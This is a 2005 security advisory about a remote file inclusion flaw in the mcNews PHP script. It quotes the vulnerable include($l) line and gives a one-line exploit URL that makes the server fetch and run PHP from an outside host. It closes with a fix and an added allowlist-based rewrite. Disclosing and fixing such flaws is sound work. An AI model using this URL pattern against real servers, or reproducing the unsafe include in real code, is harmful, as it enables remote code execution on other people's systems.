PHP mcNews arbitrary file inclusion
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BadRoot Security Advisory 2005-#0x01
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Thu Mar 17 2005 - 00:46 am GMT +1
Product: mcNews <=1.3 (successfully exploited on 1.3)
Vendor: http://www.phpforums.net/index.php?dir=dld (Home Page)
Type: Arbitrary file inclusion
Author: Jonathan Whiteley (Vukodlak)
Product description:
-----------------------------------
A News Management script.
Vulnerable code:
-----------------------------------
--> admin/install.php
...
if ($table==1)
{
    // $l is taken from the request (see Impact), so the caller chooses what is included
    include($l);
    echo '<a href="index.php">'.$lGoAdmin.'</a>';
}
...
Impact:
-----------------------------------
Anyone can inject PHP code by calling:
http://vuln-host.com/path/to/mcnews/admin/install.php?l=http://some.php/source
Solution:
-----------------------------------
Remove install.php; it is no longer needed after the first installation.
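The include above, rewritten so that the request value only selects from an allowlist of local language files. This is an added example, not mcNews code and not from the advisory author; the language codes, the language directory and the "<code>.php" file naming are assumptions.

```php
<?php
// Added example: allowlist-based replacement for include($l).
// ASSUMPTIONS (not from mcNews): the language codes, the directory layout
// and the "<code>.php" naming are hypothetical.

const LANG_ALLOWLIST = ['en', 'fr', 'it'];   // hypothetical language codes

/**
 * Map a request-supplied language code to a local file, or return null.
 * The request value is only compared against the allowlist; it is never
 * used as a path or URL itself.
 */
function resolve_language_file($requested, string $langDir): ?string
{
    // Arrays (?l[]=x) and any value not on the list are rejected outright.
    if (!is_string($requested) || !in_array($requested, LANG_ALLOWLIST, true)) {
        return null;
    }
    $base = realpath($langDir);
    $path = realpath($langDir . DIRECTORY_SEPARATOR . $requested . '.php');
    // realpath() returns false for a missing file; the prefix check keeps
    // the result inside $langDir even if a symlink points elsewhere.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary language directory and sample inputs,
// including the URL form shown in the Impact section.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . uniqid('mcnews_lang_');
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'en.php', '<?php $lGoAdmin = "Go to admin";');

$samples = ['en', 'http://some.php/source', ['en'], 'de', 'fr'];
foreach ($samples as $l) {
    $file = resolve_language_file($l, $dir);
    printf("%-26s => %s\n",
        json_encode($l, JSON_UNESCAPED_SLASHES),
        $file === null ? 'rejected' : 'include ' . basename($file));
}

unlink($dir . DIRECTORY_SEPARATOR . 'en.php');
rmdir($dir);
```

In install.php the caller would read the code explicitly (for example from $_GET['l']) and run include only when the function returns a path.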
Contact:
-----------------------------------
IRC: irc.us.azzurra.org - #badroot - Vukodlak
E-Mail: jon.whiteley@xxxxxxxxx
HP: http://www.badroot.org
Cheers
PS: Thanks to Arak for aid ;)